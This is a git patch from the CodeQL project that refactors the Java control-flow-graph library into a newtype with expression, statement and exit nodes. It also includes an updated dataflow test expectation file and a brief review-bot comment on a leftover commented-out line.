@@ -171,10 +171,12 @@ edges | B.java:154:17:154:28 | source(...) : String | B.java:175:5:175:6 | String s2 : String | provenance | | | B.java:158:7:158:13 | parameter this : MyLocal [String s1] : String | B.java:159:18:159:19 | this : MyLocal [String s1] : String | provenance | | | B.java:158:7:158:13 | parameter this : MyLocal [String s2] : String | B.java:160:14:160:15 | this : MyLocal [String s2] : String | provenance | | +| B.java:158:7:158:13 | parameter this : MyLocal [String s2] : String | B.java:160:14:160:15 | this : MyLocal [String s2] : String | provenance | | | B.java:159:9:159:12 | this [post update] : MyLocal [f] : String | B.java:158:7:158:13 | parameter this [Return] : MyLocal [f] : String | provenance | | | B.java:159:18:159:19 | s1 : String | B.java:159:9:159:12 | this [post update] : MyLocal [f] : String | provenance | | | B.java:159:18:159:19 | this : MyLocal [String s1] : String | B.java:159:18:159:19 | s1 : String | provenance | | | B.java:160:14:160:15 | this : MyLocal [String s2] : String | B.java:160:14:160:15 | s2 | provenance | | +| B.java:160:14:160:15 | this : MyLocal [String s2] : String | B.java:160:14:160:15 | s2 | provenance | | | B.java:162:12:162:15 | parameter this : MyLocal [String s2] : String | B.java:164:14:164:15 | this : MyLocal [String s2] : String | provenance | | | B.java:162:12:162:15 | parameter this : MyLocal [f] : String | B.java:163:14:163:14 | this <.field> : MyLocal [f] : String | provenance | | | B.java:163:14:163:14 | this <.field> : MyLocal [f] : String | B.java:163:14:163:14 | f | provenance | | 
@@ -464,12 +466,14 @@ nodes | B.java:154:17:154:28 | source(...) : String | semmle.label | source(...) : String | | B.java:158:7:158:13 | parameter this : MyLocal [String s1] : String | semmle.label | parameter this : MyLocal [String s1] : String | | B.java:158:7:158:13 | parameter this : MyLocal [String s2] : String | semmle.label | parameter this : MyLocal [String s2] : String | +| B.java:158:7:158:13 | parameter this : MyLocal [String s2] : String | semmle.label | parameter this : MyLocal [String s2] : String | | B.java:158:7:158:13 | parameter this [Return] : MyLocal [f] : String | semmle.label | parameter this [Return] : MyLocal [f] : String | | B.java:159:9:159:12 | this [post update] : MyLocal [f] : String | semmle.label | this [post update] : MyLocal [f] : String | | B.java:159:18:159:19 | s1 : String | semmle.label | s1 : String | | B.java:159:18:159:19 | this : MyLocal [String s1] : String | semmle.label | this : MyLocal [String s1] : String | | B.java:160:14:160:15 | s2 | semmle.label | s2 | | B.java:160:14:160:15 | this : MyLocal [String s2] : String | semmle.label | this : MyLocal [String s2] : String | +| B.java:160:14:160:15 | this : MyLocal [String s2] : String | semmle.label | this : MyLocal [String s2] : String | | B.java:162:12:162:15 | parameter this : MyLocal [String s2] : String | semmle.label | parameter this : MyLocal [String s2] : String | | B.java:162:12:162:15 | parameter this : MyLocal [f] : String | semmle.label | parameter this : MyLocal [f] : String | | B.java:163:14:163:14 | f | semmle.label | f | From 0f3dd6d8f112484556e4ce15c0da5c72bce1696b Mon Sep 17 00:00:00 2001 
From: Owen Mansel-Chan Date: Tue, 12 Nov 2024 17:01:51 +0000 Subject: [PATCH 0982/1267] Java: IPA the CFG --- java/ql/consistency-queries/cfgDeadEnds.ql | 14 +- .../lib/semmle/code/java/ControlFlowGraph.qll | 311 +++++++++++------- java/ql/lib/semmle/code/java/Expr.qll | 4 +- java/ql/lib/semmle/code/java/Statement.qll | 4 +- .../code/java/controlflow/BasicBlocks.qll | 5 + .../code/java/controlflow/Dominance.qll | 21 +- .../semmle/code/java/controlflow/Guards.qll | 6 +- .../semmle/code/java/controlflow/Paths.qll | 14 +- .../java/controlflow/UnreachableBlocks.qll | 12 +- .../code/java/dataflow/InstanceAccess.qll | 8 +- .../semmle/code/java/dataflow/Nullness.qll | 24 +- .../code/java/dataflow/RangeAnalysis.qll | 6 +- java/ql/lib/semmle/code/java/dataflow/SSA.qll | 35 +- .../semmle/code/java/dataflow/TypeFlow.qll | 4 +- .../code/java/dataflow/internal/BaseSSA.qll | 19 +- .../dataflow/internal/DataFlowPrivate.qll | 2 +- .../java/dataflow/internal/DataFlowUtil.qll | 6 +- .../rangeanalysis/ModulusAnalysisSpecific.qll | 2 +- .../rangeanalysis/SignAnalysisSpecific.qll | 2 +- .../rangeanalysis/SsaReadPositionSpecific.qll | 6 +- .../code/java/frameworks/Assertions.qll | 8 +- .../code/java/metrics/MetricCallable.qll | 6 +- .../code/java/security/PathSanitizer.qll | 10 +- .../semmle/code/java/security/Validation.qll | 2 +- .../Comparison/UselessComparisonTest.qll | 2 +- .../DoubleCheckedLockingWithInitRace.ql | 2 +- .../Concurrency/LazyInitStaticField.ql | 4 +- .../Likely Bugs/Concurrency/UnreleasedLock.ql | 14 +- .../Termination/ConstantLoopCondition.ql | 4 +- .../CWE/CWE-833/LockOrderInconsistency.ql | 4 +- .../Declarations/BreakInSwitchCase.ql | 2 +- .../Declarations/Common.qll | 6 +- .../CWE/CWE-094/SpringViewManipulationLib.qll | 2 +- .../controlflow/basic/bbStmts.expected | 4 +- .../controlflow/basic/bbStmts.ql | 2 +- .../basic/bbStrictDominance.expected | 4 +- .../controlflow/basic/bbSuccessor.expected | 4 +- .../controlflow/basic/strictDominance.ql | 2 +- 
.../controlflow/basic/strictPostDominance.ql | 2 +- .../controlflow/dominance/dominanceBad.ql | 4 +- .../controlflow/dominance/dominanceWrong.ql | 2 +- .../controlflow/dominance/dominatedByStart.ql | 6 +- .../controlflow/dominance/dominator.expected | 4 +- .../controlflow/dominance/dominatorExists.ql | 4 +- .../library-tests/controlflow/paths/paths.ql | 2 +- .../MultiCatch/MultiCatchControlFlow.expected | 10 +- .../pattern-instanceof/cfg.expected | 14 +- .../library-tests/pattern-instanceof/cfg.ql | 2 +- .../pattern-switch/cfg/test.expected | 22 +- .../library-tests/pattern-switch/cfg/test.ql | 2 +- .../CloseReaderTest/TestSucc.expected | 6 +- .../successors/CloseReaderTest/TestSucc.ql | 2 +- .../LoopVarReadTest/TestSucc.expected | 4 +- .../successors/LoopVarReadTest/TestSucc.ql | 2 +- .../successors/SaveFileTest/TestSucc.expected | 6 +- .../successors/SaveFileTest/TestSucc.ql | 2 +- .../successors/SchackTest/TestSucc.expected | 12 +- .../successors/SchackTest/TestSucc.ql | 2 +- .../successors/TestBreak/TestSucc.expected | 8 +- .../successors/TestBreak/TestSucc.ql | 2 +- .../TestContinue/FalseSuccessors.expected | 2 +- .../successors/TestContinue/TestSucc.expected | 6 +- .../successors/TestContinue/TestSucc.ql | 2 +- .../TestDeclarations/TestSucc.expected | 6 +- .../successors/TestDeclarations/TestSucc.ql | 2 +- .../successors/TestFinally/TestSucc.expected | 10 +- .../successors/TestFinally/TestSucc.ql | 2 +- .../TestSucc.expected | 6 +- .../TestFinallyBreakContinue/TestSucc.ql | 2 +- .../TestLoopBranch/TestSucc.expected | 14 +- .../successors/TestLoopBranch/TestSucc.ql | 2 +- .../successors/TestThrow/TestSucc.expected | 18 +- .../successors/TestThrow/TestSucc.ql | 2 +- .../successors/TestThrow2/TestSucc.expected | 6 +- .../successors/TestThrow2/TestSucc.ql | 2 +- .../successors/TestTryCatch/TestSucc.expected | 6 +- .../successors/TestTryCatch/TestSucc.ql | 2 +- .../TestTryWithResources/TestSucc.expected | 4 +- .../TestTryWithResources/TestSucc.ql | 2 +- 79 files 
changed, 455 insertions(+), 348 deletions(-) diff --git a/java/ql/consistency-queries/cfgDeadEnds.ql b/java/ql/consistency-queries/cfgDeadEnds.ql index 73c30015a6f..817d8e858c6 100644 --- a/java/ql/consistency-queries/cfgDeadEnds.ql +++ b/java/ql/consistency-queries/cfgDeadEnds.ql @@ -1,7 +1,6 @@ import java -import semmle.code.java.ControlFlowGraph -predicate shouldBeDeadEnd(ControlFlowNode n) { +predicate shouldBeDeadEnd(ExprParent n) { n instanceof BreakStmt and n.getFile().isKotlinSourceFile() // TODO or n instanceof Interface // TODO @@ -55,8 +54,11 @@ predicate shouldBeDeadEnd(ControlFlowNode n) { n = any(ConstCase c).getValue(_) // TODO } -from ControlFlowNode n, string s +from ControlFlowNode n, ExprParent astnode, string s where - // TODO: exists(n.getASuccessor()) and shouldBeDeadEnd(n) and s = "expected dead end" - not exists(n.getASuccessor()) and not shouldBeDeadEnd(n) and s = "unexpected dead end" -select n, n.getPrimaryQlClasses(), s + astnode = n.getAstNode() and + // TODO: exists(n.getASuccessor()) and shouldBeDeadEnd(n.getAstNode()) and s = "expected dead end" + not exists(n.getASuccessor()) and + not shouldBeDeadEnd(astnode) and + s = "unexpected dead end" +select n, astnode.getPrimaryQlClasses(), s diff --git a/java/ql/lib/semmle/code/java/ControlFlowGraph.qll b/java/ql/lib/semmle/code/java/ControlFlowGraph.qll index f8e94dc7684..26fae3c4108 100644 --- a/java/ql/lib/semmle/code/java/ControlFlowGraph.qll +++ b/java/ql/lib/semmle/code/java/ControlFlowGraph.qll @@ -4,7 +4,7 @@ * The only API exported by this library are the toplevel classes `ControlFlowNode` * and its subclass `ConditionNode`, which wrap the successor relation and the * concept of true- and false-successors of conditions. A cfg node may either be a - * statement, an expression, or the enclosing callable, indicating that + * statement, an expression, or an exit node for a callable, indicating that * execution of the callable terminates. */ 
@@ -84,45 +84,122 @@ private import Completion private import controlflow.internal.Preconditions private import controlflow.internal.SwitchCases -/** A node in the expression-level control-flow graph. */ -class ControlFlowNode extends Top, @exprparent { - /** Gets the statement containing this node, if any. */ - Stmt getEnclosingStmt() { - result = this or - result = this.(Expr).getEnclosingStmt() +/** Provides the definition of control flow nodes. */ +module ControlFlow { + private predicate hasControlFlow(Expr e) { + not exists(ConstCase cc | e = cc.getValue(_)) and + not e.getParent*() instanceof Annotation and + not e instanceof TypeAccess and + not e instanceof ArrayTypeAccess and + not e instanceof UnionTypeAccess and + not e instanceof IntersectionTypeAccess and + not e instanceof WildcardTypeAccess and + not exists(AssignExpr ae | ae.getDest() = e) } - /** Gets the immediately enclosing callable whose body contains this node. */ - Callable getEnclosingCallable() { - result = this or - result = this.(Stmt).getEnclosingCallable() or - result = this.(Expr).getEnclosingCallable() + private newtype TNode = + TExprNode(Expr e) { hasControlFlow(e) } or + TStmtNode(Stmt s) or + TExitNode(Callable c) { exists(c.getBody()) } + + /** A node in the expression-level control-flow graph. */ + class Node extends TNode { + /** Gets the statement containing this node, if any. */ + Stmt getEnclosingStmt() { + result = this.asStmt() or + result = this.asExpr().getEnclosingStmt() + } + + /** Gets the immediately enclosing callable whose body contains this node. */ + Callable getEnclosingCallable() { + this = TExitNode(result) or + result = this.asStmt().getEnclosingCallable() or + result = this.asExpr().getEnclosingCallable() + } + + /** Gets the statement this `Node` corresponds to, if any. */ + Stmt asStmt() { this = TStmtNode(result) } + + /** Gets the expression this `Node` corresponds to, if any. 
*/ + Expr asExpr() { this = TExprNode(result) } + + /** Gets the call this `Node` corresponds to, if any. */ + Call asCall() { + result = this.asExpr() or + result = this.asStmt() + } + + /** Gets an immediate successor of this node. */ + Node getASuccessor() { result = succ(this) } + + /** Gets an immediate predecessor of this node. */ + Node getAPredecessor() { this = succ(result) } + + /** Gets an exception successor of this node. */ + Node getAnExceptionSuccessor() { result = succ(this, ThrowCompletion(_)) } + + /** Gets a successor of this node that is neither an exception successor nor a jump (break, continue, return). */ + Node getANormalSuccessor() { + result = succ(this, BooleanCompletion(_, _)) or + result = succ(this, NormalCompletion()) + } + + /** Gets the basic block that contains this node. */ + BasicBlock getBasicBlock() { result.getANode() = this } + + /** Gets a textual representation of this element. */ + string toString() { + result = this.asExpr().toString() + or + result = this.asStmt().toString() + or + result = "Exit" and this instanceof ExitNode + } + + /** Gets the source location for this element. */ + Location getLocation() { + result = this.asExpr().getLocation() or + result = this.asStmt().getLocation() or + result = this.(ExitNode).getEnclosingCallable().getLocation() + } + + /** + * Get the most appropriate AST node for this control flow node, if any. + * + * This is needed for the equivalence relation on basic blocks in range + * analysis. + */ + ExprParent getAstNode() { + result = this.asExpr() or + result = this.asStmt() or + this = TExitNode(result) + } } - /** Gets an immediate successor of this node. */ - ControlFlowNode getASuccessor() { result = succ(this) } - - /** Gets an immediate predecessor of this node. */ - ControlFlowNode getAPredecessor() { this = succ(result) } - - /** Gets an exception successor of this node. 
*/ - ControlFlowNode getAnExceptionSuccessor() { result = succ(this, ThrowCompletion(_)) } - - /** Gets a successor of this node that is neither an exception successor nor a jump (break, continue, return). */ - ControlFlowNode getANormalSuccessor() { - result = succ(this, BooleanCompletion(_, _)) or - result = succ(this, NormalCompletion()) - } - - /** Gets the basic block that contains this node. */ - BasicBlock getBasicBlock() { result.getANode() = this } + /** A synthetic node for the exit of a callable. */ + class ExitNode extends Node, TExitNode { } } +class ControlFlowNode = ControlFlow::Node; + /** Gets the intra-procedural successor of `n`. */ private ControlFlowNode succ(ControlFlowNode n) { result = succ(n, _) } cached private module ControlFlowGraphImpl { + private import ControlFlow + + private class AstNode extends ExprParent { + AstNode() { this instanceof Expr or this instanceof Stmt } + + Stmt getEnclosingStmt() { + result = this or + result = this.(Expr).getEnclosingStmt() + } + + Node getCFGNode() { result.asExpr() = this or result.asStmt() = this } + } + /** * Gets a label that applies to this statement. */ @@ -167,7 +244,7 @@ private module ControlFlowGraphImpl { * `ClassCastException` is expected, or because it is a Kotlin not-null check * and a `NullPointerException` is expected. */ - private predicate mayThrow(ControlFlowNode n, ThrowableType t) { + private predicate mayThrow(AstNode n, ThrowableType t) { t = n.(ThrowStmt).getThrownExceptionType() or exists(Call c | c = n | @@ -200,7 +277,7 @@ private module ControlFlowGraphImpl { * Bind `t` to an unchecked exception that may transfer control to a finally * block inside which `n` is nested. */ - private predicate uncheckedExceptionFromFinally(ControlFlowNode n, ThrowableType t) { + private predicate uncheckedExceptionFromFinally(AstNode n, ThrowableType t) { exists(TryStmt try | n.getEnclosingStmt().getEnclosingStmt+() = try.getBlock() or n.(Expr).getParent*() = try.getAResource() 
@@ -214,7 +291,7 @@ private module ControlFlowGraphImpl { * Bind `t` to all unchecked exceptions that may be caught by some * `try-catch` inside which `n` is nested. */ - private predicate uncheckedExceptionFromCatch(ControlFlowNode n, ThrowableType t) { + private predicate uncheckedExceptionFromCatch(AstNode n, ThrowableType t) { exists(TryStmt try, UncheckedThrowableSuperType caught | n.getEnclosingStmt().getEnclosingStmt+() = try.getBlock() or n.(Expr).getParent*() = try.getAResource() @@ -229,7 +306,7 @@ private module ControlFlowGraphImpl { * body or the resources (if any) of `try`. */ private ThrowableType thrownInBody(TryStmt try) { - exists(ControlFlowNode n | mayThrow(n, result) | + exists(AstNode n | mayThrow(n, result) | n.getEnclosingStmt().getEnclosingStmt+() = try.getBlock() or n.(Expr).getParent*() = try.getAResource() ) @@ -287,7 +364,7 @@ private module ControlFlowGraphImpl { * That is, contexts where the control-flow edges depend on `value` given that `b` ends * with a `booleanCompletion(value, _)`. */ - private predicate inBooleanContext(ControlFlowNode b) { + private predicate inBooleanContext(AstNode b) { exists(LogicExpr logexpr | logexpr.(BinaryExpr).getLeftOperand() = b or @@ -493,9 +570,7 @@ private module ControlFlowGraphImpl { * immediately before either falling through to execute successor statements or execute a rule body * if present. `completion` is the completion kind of the last operation. */ - private predicate lastPatternCaseMatchingOp( - PatternCase pc, ControlFlowNode last, Completion completion - ) { + private predicate lastPatternCaseMatchingOp(PatternCase pc, Node last, Completion completion) { last(pc.getAPattern(), last, completion) and completion = NormalCompletion() and not exists(pc.getGuard()) 
@@ -514,7 +589,7 @@ private module ControlFlowGraphImpl { * and `ThrowStmt`. CFG nodes without child nodes in the CFG that may complete * normally are also included. */ - private class PostOrderNode extends ControlFlowNode { + private class PostOrderNode extends AstNode { PostOrderNode() { // For VarAccess and ArrayAccess only read accesses (r-values) are included, // as write accesses aren't included in the CFG. @@ -576,7 +651,7 @@ private module ControlFlowGraphImpl { } /** Gets child nodes in their order of execution. Indexing starts at either -1 or 0. */ - ControlFlowNode getChildNode(int index) { + AstNode getChildNode(int index) { exists(ArrayAccess e | e = this | index = 0 and result = e.getArray() or @@ -649,7 +724,7 @@ private module ControlFlowGraphImpl { } /** Gets the first child node, if any. */ - ControlFlowNode firstChild() { + AstNode firstChild() { result = this.getChildNode(-1) or result = this.getChildNode(0) and not exists(this.getChildNode(-1)) @@ -687,18 +762,18 @@ private module ControlFlowGraphImpl { /** * Determine the part of the AST node `n` that will be executed first. */ - private ControlFlowNode first(ControlFlowNode n) { - result = n and n instanceof LogicExpr + private Node first(AstNode n) { + result.asExpr() = n and n instanceof LogicExpr or - result = n and n instanceof ConditionalExpr + result.asExpr() = n and n instanceof ConditionalExpr or - result = n and n instanceof WhenExpr + result.asExpr() = n and n instanceof WhenExpr or - result = n and n instanceof WhenBranch + result.asStmt() = n and n instanceof WhenBranch or - result = n and n instanceof StmtExpr + result.asExpr() = n and n instanceof StmtExpr or - result = n and n.(PostOrderNode).isLeafNode() + result = n.getCFGNode() and n.(PostOrderNode).isLeafNode() or result = first(n.(PostOrderNode).firstChild()) or 
@@ -706,12 +781,11 @@ private module ControlFlowGraphImpl { or result = first(n.(SynchronizedStmt).getExpr()) or - result = n and - n instanceof Stmt and + result.asStmt() = n and not n instanceof PostOrderNode and not n instanceof SynchronizedStmt or - result = n and n instanceof SwitchExpr + result.asExpr() = n and n instanceof SwitchExpr } /** @@ -722,9 +796,7 @@ private module ControlFlowGraphImpl { * node in the `try` block that may not complete normally, or a node in * the `try` block that has no control flow successors inside the block. */ - private predicate catchOrFinallyCompletion( - TryStmt try, ControlFlowNode last, Completion completion - ) { + private predicate catchOrFinallyCompletion(TryStmt try, Node last, Completion completion) { last(try.getBlock(), last, completion) or last(try.getAResource(), last, completion) and completion = ThrowCompletion(_) @@ -737,7 +809,7 @@ private module ControlFlowGraphImpl { * In other words, if `last` throws an exception it is possibly not caught by any * of the catch clauses. */ - private predicate uncaught(TryStmt try, ControlFlowNode last, Completion completion) { + private predicate uncaught(TryStmt try, Node last, Completion completion) { catchOrFinallyCompletion(try, last, completion) and ( exists(ThrowableType thrown | @@ -767,12 +839,12 @@ private module ControlFlowGraphImpl { * This is similar to `uncaught`, but also includes final statements of `catch` * clauses. */ - private predicate finallyPred(TryStmt try, ControlFlowNode last, Completion completion) { + private predicate finallyPred(TryStmt try, Node last, Completion completion) { uncaught(try, last, completion) or last(try.getACatchClause(), last, completion) } - private predicate lastInFinally(TryStmt try, ControlFlowNode last) { + private predicate lastInFinally(TryStmt try, Node last) { last(try.getFinally(), last, NormalCompletion()) } 
@@ -796,7 +868,7 @@ private module ControlFlowGraphImpl { * A `booleanCompletion` implies that `n` is an `Expr`. Any abnormal * completion besides `throwCompletion` implies that `n` is a `Stmt`. */ - private predicate last(ControlFlowNode n, ControlFlowNode last, Completion completion) { + private predicate last(AstNode n, Node last, Completion completion) { // Exceptions are propagated from any sub-expression. // As are any break, yield, continue, or return completions. exists(Expr e | e.getParent() = n | @@ -853,15 +925,18 @@ private module ControlFlowGraphImpl { ) or exists(InstanceOfExpr ioe | ioe.isPattern() and ioe = n | - last = n and completion = basicBooleanCompletion(false) + last.asExpr() = n and completion = basicBooleanCompletion(false) or last(ioe.getPattern(), last, NormalCompletion()) and completion = basicBooleanCompletion(true) ) or // The last node of a node executed in post-order is the node itself. - n.(PostOrderNode).mayCompleteNormally() and last = n and completion = NormalCompletion() + // n.(PostOrderNode).mayCompleteNormally() and last = n and completion = NormalCompletion() + exists(PostOrderNode p | p = n | + p.mayCompleteNormally() and last = p.getCFGNode() and completion = NormalCompletion() + ) or - last = n and completion = basicBooleanCompletion(n.(BooleanLiteral).getBooleanValue()) + last.asExpr() = n and completion = basicBooleanCompletion(n.(BooleanLiteral).getBooleanValue()) or // The last statement in a block is any statement that does not complete normally, // or the last statement. @@ -997,7 +1072,7 @@ private module ControlFlowGraphImpl { // * On success of its guard test, if it is not a rule (boolean true) // (the latter two cases are accounted for by lastPatternCaseMatchingOp) exists(PatternCase pc | n = pc | - last = pc and completion = basicBooleanCompletion(false) + last.asStmt() = pc and completion = basicBooleanCompletion(false) or last(pc.getGuard(), last, completion) and completion = BooleanCompletion(false, _) 
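Review bot: The post-order case of `last` keeps the superseded disjunct as a comment (`// n.(PostOrderNode).mayCompleteNormally() and last = n and completion = NormalCompletion()`) directly above the new `exists(PostOrderNode p | p = n | ...)` form. With `last` now a `Node` and `n` an `AstNode`, that old line cannot hold as written, so it should be deleted rather than kept as dead text. The remaining comment could be reworded to match the new shape, e.g. `// The last node of an AST node executed in post-order is that node's own CFG node.` The body of `last` starts and ends outside this hunk.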
@@ -1010,13 +1085,15 @@ private module ControlFlowGraphImpl { last(n.(SynchronizedStmt).getBlock(), last, completion) or // `return` statements give rise to a `Return` completion - last = n.(ReturnStmt) and completion = ReturnCompletion() + last.asStmt() = n.(ReturnStmt) and completion = ReturnCompletion() or // `throw` statements or throwing calls give rise to ` Throw` completion - exists(ThrowableType tt | mayThrow(n, tt) | last = n and completion = ThrowCompletion(tt)) + exists(ThrowableType tt | mayThrow(n, tt) | + last = n.getCFGNode() and completion = ThrowCompletion(tt) + ) or // `break` statements give rise to a `Break` completion - exists(BreakStmt break | break = n and last = n | + exists(BreakStmt break | break = n and last.asStmt() = n | completion = labelledBreakCompletion(MkLabel(break.getLabel())) or not exists(break.getLabel()) and completion = anonymousBreakCompletion() @@ -1031,7 +1108,7 @@ private module ControlFlowGraphImpl { ) or // `continue` statements give rise to a `Continue` completion - exists(ContinueStmt cont | cont = n and last = n | + exists(ContinueStmt cont | cont = n and last.asStmt() = n | completion = labelledContinueCompletion(MkLabel(cont.getLabel())) or not exists(cont.getLabel()) and completion = anonymousContinueCompletion() @@ -1067,7 +1144,7 @@ private module ControlFlowGraphImpl { // the last node of the condition of the last branch in the absence of an else-branch. exists(WhenExpr whenexpr | whenexpr = n | // If we have no branches then we are the last node - last = n and + last.asExpr() = n and completion = NormalCompletion() and not exists(whenexpr.getBranch(_)) or 
@@ -1117,17 +1194,19 @@ private module ControlFlowGraphImpl { * execution finishes with the given completion. */ cached - ControlFlowNode succ(ControlFlowNode n, Completion completion) { - // Callables serve as their own exit nodes. - exists(Callable c | last(c.getBody(), n, completion) | result = c) + Node succ(Node n, Completion completion) { + // The successor of a callable is its exit node. + exists(Callable c | last(c.getBody(), n, completion) | + result.(ExitNode).getEnclosingCallable() = c + ) or // Logic expressions and conditional expressions execute in AST pre-order. completion = NormalCompletion() and ( - result = first(n.(AndLogicalExpr).getLeftOperand()) or - result = first(n.(OrLogicalExpr).getLeftOperand()) or - result = first(n.(LogNotExpr).getExpr()) or - result = first(n.(ConditionalExpr).getCondition()) + result = first(n.asExpr().(AndLogicalExpr).getLeftOperand()) or + result = first(n.asExpr().(OrLogicalExpr).getLeftOperand()) or + result = first(n.asExpr().(LogNotExpr).getExpr()) or + result = first(n.asExpr().(ConditionalExpr).getCondition()) ) or // If a logic expression doesn't short-circuit then control flows from its left operand to its right. @@ -1151,9 +1230,11 @@ private module ControlFlowGraphImpl { ) or exists(InstanceOfExpr ioe | ioe.isPattern() | - last(ioe.getExpr(), n, completion) and completion = NormalCompletion() and result = ioe + last(ioe.getExpr(), n, completion) and + completion = NormalCompletion() and + result.asExpr() = ioe or - n = ioe and + n.asExpr() = ioe and result = first(ioe.getPattern()) and completion = basicBooleanCompletion(true) ) 
@@ -1164,11 +1245,11 @@ private module ControlFlowGraphImpl { | result = first(p.getChildNode(i + 1)) or - not exists(p.getChildNode(i + 1)) and result = p + not exists(p.getChildNode(i + 1)) and result = p.getCFGNode() ) or // Statements within a block execute sequentially. - result = first(n.(BlockStmt).getStmt(0)) and completion = NormalCompletion() + result = first(n.asStmt().(BlockStmt).getStmt(0)) and completion = NormalCompletion() or exists(BlockStmt blk, int i | last(blk.getStmt(i), n, completion) and @@ -1178,7 +1259,7 @@ private module ControlFlowGraphImpl { or // Control flows to the corresponding branch depending on the boolean completion of the condition. exists(IfStmt s | - n = s and result = first(s.getCondition()) and completion = NormalCompletion() + n.asStmt() = s and result = first(s.getCondition()) and completion = NormalCompletion() or last(s.getCondition(), n, completion) and completion = BooleanCompletion(true, _) and @@ -1190,7 +1271,7 @@ private module ControlFlowGraphImpl { ) or // For statements: - exists(ForStmt for, ControlFlowNode condentry | + exists(ForStmt for, Node condentry | // Any part of the control flow that aims for the condition needs to hit either the condition... condentry = first(for.getCondition()) or @@ -1198,10 +1279,10 @@ private module ControlFlowGraphImpl { not exists(for.getCondition()) and condentry = first(for.getStmt()) | // From the entry point, which is the for statement itself, control goes to either the first init expression... - n = for and result = first(for.getInit(0)) and completion = NormalCompletion() + n.asStmt() = for and result = first(for.getInit(0)) and completion = NormalCompletion() or // ...or the condition if the for doesn't include init expressions. - n = for and + n.asStmt() = for and not exists(for.getAnInit()) and result = condentry and completion = NormalCompletion() 
@@ -1238,27 +1319,29 @@ private module ControlFlowGraphImpl { // Enhanced for statements: exists(EnhancedForStmt for | // First the expression gets evaluated... - n = for and result = first(for.getExpr()) and completion = NormalCompletion() + n.asStmt() = for and result = first(for.getExpr()) and completion = NormalCompletion() or // ...then the variable gets assigned... last(for.getExpr(), n, completion) and completion = NormalCompletion() and - result = for.getVariable() + result.asExpr() = for.getVariable() or // ...and then control goes to the body of the loop. - n = for.getVariable() and result = first(for.getStmt()) and completion = NormalCompletion() + n.asExpr() = for.getVariable() and + result = first(for.getStmt()) and + completion = NormalCompletion() or // Finally, the back edge of the loop goes to reassign the variable. last(for.getStmt(), n, completion) and continues(completion, for) and - result = for.getVariable() + result.asExpr() = for.getVariable() ) or // While loops start at the condition... - result = first(n.(WhileStmt).getCondition()) and completion = NormalCompletion() + result = first(n.asStmt().(WhileStmt).getCondition()) and completion = NormalCompletion() or // ...and do-while loops start at the body. - result = first(n.(DoStmt).getStmt()) and completion = NormalCompletion() + result = first(n.asStmt().(DoStmt).getStmt()) and completion = NormalCompletion() or exists(LoopStmt loop | loop instanceof WhileStmt or loop instanceof DoStmt | // Control goes from the condition via a true-completion to the body... @@ -1282,7 +1365,7 @@ private module ControlFlowGraphImpl { ) or // After the last resource declaration, control transfers to the body. - exists(TryStmt try | n = try and completion = NormalCompletion() | + exists(TryStmt try | n.asStmt() = try and completion = NormalCompletion() | result = first(try.getResource(0)) or not exists(try.getAResource()) and result = first(try.getBlock()) 
@@ -1310,7 +1393,7 @@ private module ControlFlowGraphImpl { or // Catch clauses first assign their variable and then execute their block exists(CatchClause cc | completion = NormalCompletion() | - n = cc and result = first(cc.getVariable()) + n.asStmt() = cc and result = first(cc.getVariable()) or last(cc.getVariable(), n, completion) and result = first(cc.getBlock()) ) @@ -1321,7 +1404,9 @@ private module ControlFlowGraphImpl { switchExpr = switch.(SwitchStmt).getExpr() or switchExpr = switch.(SwitchExpr).getExpr() | // From the entry point control is transferred first to the expression... - n = switch and result = first(switchExpr) and completion = NormalCompletion() + (n.asStmt() = switch or n.asExpr() = switch) and + result = first(switchExpr) and + completion = NormalCompletion() or // ...and then to any case up to and including the first pattern case, if any. last(switchExpr, n, completion) and @@ -1345,7 +1430,7 @@ private module ControlFlowGraphImpl { or // A pattern case that completes boolean false (type test or guard failure) continues to consider other cases: exists(PatternCase case | completion = BooleanCompletion(false, _) | - last(case, n, completion) and result = getASuccessorSwitchCase(case, switch) + last(case, n, completion) and result.asStmt() = getASuccessorSwitchCase(case, switch) ) ) or @@ -1358,7 +1443,7 @@ private module ControlFlowGraphImpl { // * Variable declarations -normal-> rule execution (when there is no guard) // * Guard success -true-> rule execution exists(PatternCase pc | - n = pc and + n.asStmt() = pc and completion = basicBooleanCompletion(true) and result = first(pc.getAPattern()) or @@ -1375,7 +1460,7 @@ private module ControlFlowGraphImpl { ) or // Non-pattern cases have an internal edge leading to their rule body if any when the case matches. - exists(SwitchCase case | n = case | + exists(SwitchCase case | n.asStmt() = case | not case instanceof PatternCase and completion = NormalCompletion() and ( 
@@ -1387,32 +1472,32 @@ private module ControlFlowGraphImpl { or // Yield exists(YieldStmt yield | completion = NormalCompletion() | - n = yield and result = first(yield.getValue()) + n.asStmt() = yield and result = first(yield.getValue()) ) or // Synchronized statements execute their expression _before_ synchronization, so the CFG reflects that. exists(SynchronizedStmt synch | completion = NormalCompletion() | - last(synch.getExpr(), n, completion) and result = synch + last(synch.getExpr(), n, completion) and result.asStmt() = synch or - n = synch and result = first(synch.getBlock()) + n.asStmt() = synch and result = first(synch.getBlock()) ) or - result = first(n.(ExprStmt).getExpr()) and completion = NormalCompletion() + result = first(n.asStmt().(ExprStmt).getExpr()) and completion = NormalCompletion() or - result = first(n.(StmtExpr).getStmt()) and completion = NormalCompletion() + result = first(n.asExpr().(StmtExpr).getStmt()) and completion = NormalCompletion() or - result = first(n.(LabeledStmt).getStmt()) and completion = NormalCompletion() + result = first(n.asStmt().(LabeledStmt).getStmt()) and completion = NormalCompletion() or // Variable declarations in a variable declaration statement are executed sequentially. exists(LocalVariableDeclStmt s | completion = NormalCompletion() | - n = s and result = first(s.getVariable(1)) + n.asStmt() = s and result = first(s.getVariable(1)) or exists(int i | last(s.getVariable(i), n, completion) and result = first(s.getVariable(i + 1))) ) or // When expressions: exists(WhenExpr whenexpr | - n = whenexpr and + n.asExpr() = whenexpr and result = first(whenexpr.getBranch(0)) and completion = NormalCompletion() or @@ -1425,7 +1510,7 @@ private module ControlFlowGraphImpl { or // When branches: exists(WhenBranch whenbranch | - n = whenbranch and + n.asStmt() = whenbranch and completion = NormalCompletion() and result = first(whenbranch.getCondition()) or 
